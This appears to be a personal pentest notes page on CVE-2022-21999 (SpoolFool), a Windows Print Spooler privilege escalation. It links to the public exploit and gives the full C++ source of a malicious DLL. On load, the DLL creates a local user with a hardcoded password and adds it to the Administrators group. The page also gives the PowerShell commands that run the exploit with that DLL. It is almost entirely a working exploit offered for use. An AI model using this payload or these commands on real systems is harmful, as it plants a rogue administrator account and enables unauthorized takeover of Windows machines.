> For the complete documentation index, see [llms.txt](https://notes.morph3.blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.morph3.blog/windows/exploits/cve-2022-21999-spoolfool.md).

# CVE-2022-21999 - SpoolFool

Link is below

* <https://github.com/ly4k/SpoolFool>

pwn.dll,

```cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
  
void pwn() {
    system("net user morph3 Password123! /add");
    system("net localgroup Administrators morph3 /add");
}

  
BOOL APIENTRY DllMain( HMODULE hModule,
 DWORD ul_reason_for_call,
 LPVOID lpReserved
 )
{

 switch (ul_reason_for_call)
 {
	 case DLL_PROCESS_ATTACH:
		 pwn();
	 case DLL_THREAD_ATTACH:
	 case DLL_THREAD_DETACH:
	 case DLL_PROCESS_DETACH:
	 break;

 }

 return TRUE;

}
```

Exploiting it,

```powershell
Import-Module .\SpoolFool.ps1
Invoke-SpoolFool -dll .\pwn.dll
```
